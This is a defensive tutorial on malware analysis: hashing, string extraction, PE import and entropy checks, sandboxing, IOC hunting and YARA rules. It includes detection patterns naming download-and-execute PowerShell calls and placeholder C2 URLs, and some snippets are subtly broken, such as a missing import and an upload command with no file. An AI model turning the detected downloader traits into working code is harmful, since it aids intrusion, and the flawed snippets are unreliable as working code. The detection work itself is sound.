Malware Analysis Basics
Malware analysis is the process of understanding what a malicious program does, how it works, and what indicators it leaves behind. This note covers static and dynamic analysis techniques, sandboxing, hash-based identification, YARA rules, and common indicators of compromise (IOCs).
Analysis Approaches
Section titled “Analysis Approaches”STATIC ANALYSIS DYNAMIC ANALYSIS───────────────── ────────────────────────────────Examine the file without Execute the sample in a controlledexecuting it environment and observe behaviour
Techniques: Techniques: File type identification Process monitoring Hash computation Network traffic capture String extraction Registry/file system changes Disassembly / decompilation Memory inspection
Pros: Safe (no execution) Pros: Reveals actual runtime behaviourCons: Obfuscation can hide Cons: Sandbox evasion; detonation needed true behaviourFile Identification
Section titled “File Identification”The first step: understand what you’re dealing with before touching it.
# Identify file type (don't trust the extension)file suspicious.exe# ELF 64-bit LSB executable...# PE32 executable (GUI) Intel 80386...# Zip archive data...
# Common magic bytes (file headers):# MZ (4D 5A) → Windows PE executable# ELF (7F 45 4C 46) → Linux ELF binary# PK (50 4B) → ZIP / Office documents (docx, xlsx are ZIPs)# %PDF → PDF file# \x7fELF → ELF binary
# Check magic bytes manuallyxxd suspicious.exe | head -3# orhexdump -C suspicious.exe | head -5Hash Identification
Section titled “Hash Identification”Cryptographic hashes create a fingerprint for a file. Matching a hash to a known database identifies malware without analysis.
# Compute hashesmd5sum suspicious.exe # MD5 - fast; still used for identification (not integrity)sha1sum suspicious.exe # SHA-1sha256sum suspicious.exe # SHA-256 - primary standard for malware IOCs
# Save hash for referencesha256sum suspicious.exe | awk '{print $1}' > sample.hashcat sample.hash
# Look up hash on VirusTotal (CLI)pip install vt-pyexport VT_API_KEY="your_api_key_here"
python3 << 'EOF'import vt, sys
HASH = "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f"with vt.Client(os.environ["VT_API_KEY"]) as client: file = client.get_object(f"/files/{HASH}") print(f"Name: {file.meaningful_name}") print(f"Detection: {file.last_analysis_stats['malicious']}/{sum(file.last_analysis_stats.values())} engines") print(f"Family: {file.popular_threat_classification.get('suggested_threat_label', 'unknown')}")EOF
# Or via curlcurl -s --request GET \ --url "https://www.virustotal.com/api/v3/files/$(sha256sum suspicious.exe | awk '{print $1}')" \ --header "x-apikey: $VT_API_KEY" | python3 -m json.tool | grep -E "malicious|type_description"Static Analysis
Section titled “Static Analysis”String Extraction
Section titled “String Extraction”Strings embedded in binaries reveal intent - URLs, registry keys, file paths, error messages, commands.
# Extract all printable strings from a binarystrings suspicious.exe
# Filter for interesting patternsstrings suspicious.exe | grep -E "http[s]?://" # URLsstrings suspicious.exe | grep -iE "cmd|powershell|exec" # command executionstrings suspicious.exe | grep -iE "password|passwd|cred" # credential referencesstrings suspicious.exe | grep -E "HKCU|HKLM|Software" # Windows registry pathsstrings suspicious.exe | grep -E "\.dll|LoadLibrary" # DLL loadingstrings suspicious.exe | grep -E "CreateProcess|ShellExecute|WinExec" # process creation
# Unicode strings (wide strings - common in Windows malware)strings -el suspicious.exe # 16-bit little-endian (UTF-16LE)
# Extract emails and IPsstrings suspicious.exe | grep -E "[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}"strings suspicious.exe | grep -E "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}"PE File Analysis (Windows)
Section titled “PE File Analysis (Windows)”# Install pefile (Python library)pip install pefile
python3 << 'EOF'import pefilepe = pefile.PE("suspicious.exe")
# Basic infoprint(f"Machine: {hex(pe.FILE_HEADER.Machine)}") # 0x14c = x86, 0x8664 = x64print(f"Timestamp: {pe.FILE_HEADER.TimeDateStamp}")print(f"Sections: {[s.Name.decode().strip() for s in pe.sections]}")
# Check for suspicious section characteristicsfor section in pe.sections: name = section.Name.decode().strip('\x00') print(f"Section: {name} | Entropy: {section.get_entropy():.2f} | RawSize: {section.SizeOfRawData}") # Entropy > 7.0 suggests packed/encrypted content
# Imported DLLs and functions (reveal capability)if hasattr(pe, 'DIRECTORY_ENTRY_IMPORT'): for entry in pe.DIRECTORY_ENTRY_IMPORT: print(f" DLL: {entry.dll.decode()}") for imp in entry.imports: if imp.name: print(f" {imp.name.decode()}")EOFSuspicious Windows API imports by category:
| Category | Suspicious APIs |
|---|---|
| Process injection | VirtualAllocEx, WriteProcessMemory, CreateRemoteThread |
| Persistence | RegSetValueEx, CreateService, ScheduledTaskCreate |
| Network | InternetOpen, WSAConnect, URLDownloadToFile |
| File system | FindFirstFile, CopyFile, DeleteFile |
| Privilege escalation | AdjustTokenPrivileges, ImpersonateLoggedOnUser |
| Anti-analysis | IsDebuggerPresent, GetTickCount, QueryPerformanceCounter |
Entropy Analysis
Section titled “Entropy Analysis”Packed or encrypted malware has high entropy (random-looking data):
# Check section entropy (entropy > 7.2 = likely packed/encrypted)python3 -c "import pefile, math
def entropy(data): if not data: return 0 counts = {} for byte in data: counts[byte] = counts.get(byte, 0) + 1 return -sum((c/len(data)) * math.log2(c/len(data)) for c in counts.values())
pe = pefile.PE('suspicious.exe')for s in pe.sections: data = s.get_data() print(f'{s.Name.decode().strip():10} entropy={entropy(data):.2f}')"Sandboxing (Dynamic Analysis)
Section titled “Sandboxing (Dynamic Analysis)”A sandbox executes malware in a controlled, isolated environment and records everything it does.
Online Sandboxes
Section titled “Online Sandboxes”| Service | Type | Notes |
|---|---|---|
| any.run | Interactive | Watch execution in real time; interact with the sample |
| VirusTotal | Automated | Runs 70+ AV engines + some sandbox analysis |
| Joe Sandbox | Automated | Detailed Windows/Linux/macOS analysis |
| Hybrid Analysis | Automated | Free; Falcon Intelligence sandbox |
| Triage (tria.ge) | Automated | Fast; API access; YARA matching |
# Submit a sample via VirusTotal APIcurl -s --request POST \ --url "https://www.virustotal.com/api/v3/files" \ --header "x-apikey: $VT_API_KEY" \ | python3 -m json.tool | grep -E '"id"|"type"'
# Get analysis results after a minuteANALYSIS_ID="<id from above>"curl -s --request GET \ --url "https://www.virustotal.com/api/v3/analyses/$ANALYSIS_ID" \ --header "x-apikey: $VT_API_KEY" \ | python3 -m json.tool | grep -E "status|malicious|harmless"Local Sandbox - Cuckoo
Section titled “Local Sandbox - Cuckoo”# Cuckoo Sandbox - self-hosted dynamic analysis platform# (Runs malware in a VM; intercepts system calls and network traffic)
# Installation overview (simplified)pip install cuckoocuckoo initcuckoo community # download rules and signatures
# Configure a Windows 7 analysis VM in VirtualBox# (Cuckoo agent must be installed in the VM)
# Submit a samplecuckoo submit suspicious.execuckoo submit --timeout 120 suspicious.exe # run for 2 minutes
# View results in web UIcuckoo web runserver
# What Cuckoo captures:# Process tree (parent-child relationships)# System call trace (file, registry, network, process operations)# Network traffic (PCAP)# Screenshots (periodic)# Memory dumps# Extracted network IOCs (domains, IPs, URLs contacted)Common Malware Indicators (IOCs)
Section titled “Common Malware Indicators (IOCs)”IOCs are artifacts that signal a system has been compromised.
Host-Based IOCs
Section titled “Host-Based IOCs”# 1. Unknown processesps aux | grep -v "$(ps aux | awk '{print $11}' | sort -u | grep -v grep)"# More practically:ps auxf # shows process tree (parent-child)pstree -p # tree view with PIDs
# 2. Suspicious network connections (beaconing / C2 traffic)ss -tulpan # all connections with processesnetstat -tulpan | grep ESTABLISHED | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -rn# High frequency connections to same IP = possible beacon
# 3. Suspicious files in common locationsfind /tmp /var/tmp /dev/shm -type f -executable 2>/dev/nullfind /tmp -name "*.sh" -o -name "*.py" -o -name "*.pl" 2>/dev/nullfind / -name ".*" -type f -newer /etc/passwd 2>/dev/null | head -20 # hidden files newer than passwd
# 4. Recently modified files in system directoriesfind /etc /usr/bin /usr/sbin -newer /tmp -type f 2>/dev/null
# 5. Persistence mechanisms# Crontabscrontab -l 2>/dev/nullfor user in $(cut -f1 -d: /etc/passwd); do crontab -u $user -l 2>/dev/null; donecat /etc/cron* /var/spool/cron/crontabs/* 2>/dev/null
# Systemd units added by malwaresystemctl list-units --type=service --state=running | grep -v "\.service"find /etc/systemd /usr/lib/systemd ~/.config/systemd -name "*.service" 2>/dev/null | xargs ls -la
# Linux LD_PRELOAD injection (library hijack)cat /etc/ld.so.preload 2>/dev/null # should be empty or not exist
# 6. Unusual user accountsawk -F: '$3 == 0 && $1 != "root" { print "ROOT UID: "$1 }' /etc/passwdawk -F: '$NF !~ /nologin|false/ && $3 >= 1000 { print $1 }' /etc/passwdlastlog | grep -v "Never logged in" | tail -20Network-Based IOCs
Section titled “Network-Based IOCs”# Capture network traffic from a suspicious processPID=$(pgrep suspicious)nsenter -t $PID -n tcpdump -i any -w /tmp/suspect-$PID.pcap &
# Look for beaconing patterns in a PCAPtcpdump -r capture.pcap -nn 'tcp' | awk '{print $3}' | cut -d. -f1-4 | sort | uniq -c | sort -rn | head
# DNS queries (potential C2 domain generation algorithms - DGA)tcpdump -r capture.pcap -nn 'port 53' | grep -v "ptr\|PTR\|SOA" | awk '{print $NF}' | sort | uniq -c | sort -rn
# tshark - extract all contacted IPstshark -r capture.pcap -T fields -e ip.dst -q | sort | uniq -c | sort -rn | head -20
# Look for long DNS names (possible DNS tunneling or DGA)tshark -r capture.pcap -T fields -e dns.qry.name -q \ | awk 'length($0) > 30' | sort | uniq -c | sort -rnYARA Rules
Section titled “YARA Rules”YARA is the pattern-matching language for malware identification. Each rule describes strings or byte patterns, combined with logical conditions.
/* Basic YARA rule structure */rule ExampleMalware { meta: description = "Detects Example malware C2 URLs" author = "[email protected]" date = "2025-03-11" reference = "https://threatintel.example.com/report/123" hash = "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f"
strings: $url1 = "malicious-c2.ru/beacon" ascii $url2 = "evil-domain.cn/upload" ascii wide // wide = UTF-16LE match $mutex = "Global\\MutexName123" ascii $pdb_path = "C:\\Users\\attacker\\malware.pdb" ascii
// Hex byte pattern (packed shellcode XOR key) $xor_key = { 31 C0 50 68 }
// Regex pattern $ip_regex = /\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/ ascii
condition: uint16(0) == 0x5A4D and // PE magic bytes "MZ" filesize < 2MB and any of ($url*) and // any URL string matches $mutex and not $pdb_path // exclude known samples}# Install YARAapt install yara
# Write a rule and test itcat > detect_poshell.yar << 'EOF'rule PowerShellDownloader { strings: $ps1 = "powershell" nocase $dl1 = "DownloadString" nocase $dl2 = "Invoke-Expression" nocase $web = "WebClient" nocase $enc = "FromBase64String" nocase
condition: 3 of them}EOF
# Scan a fileyara -r detect_poshell.yar suspicious.exe
# Scan a directory recursivelyyara -r detect_poshell.yar /tmp/samples/
# Scan memory of a running processyara detect_poshell.yar -p 1234
# Use community rules (from Awesome-YARA, ESET, Mandiant, etc.)# Clone signature setsgit clone https://github.com/Neo23x0/signature-base.git
# Scan with multiple rule filesyara -r signature-base/yara/mal_*.yar /tmp/suspicious.exeAnalysis Workflow Summary
Section titled “Analysis Workflow Summary”1. SAFE ENVIRONMENT → Work in an isolated VM with no network access to production → Snapshot the VM before analysis; restore after → Use REMnux (remnux.org) - purpose-built Linux distro for analysis
2. IDENTIFY → Compute SHA-256 hash → check VirusTotal → file command, xxd for magic bytes → Check file entropy (packed = ~7.0+)
3. STATIC ANALYSIS → strings → filter for IPs, URLs, registry keys, commands → PE imports → identify capability categories → Disassemble: Ghidra (free) or IDA Pro (commercial)
4. DYNAMIC ANALYSIS → Submit to any.run or Hybrid Analysis → Or run in local Cuckoo sandbox → Capture: process tree, file/registry changes, network traffic
5. IOC EXTRACTION → Extract: file hashes, C2 IPs/domains, mutex names, registry keys → Encode in STIX/TAXII format for sharing → Write YARA rules for detection
6. REPORTING → Document: malware family, capabilities, C2 infrastructure → Share IOCs with your SIEM for blocking and alerting → Update EDR exclusions / detection rules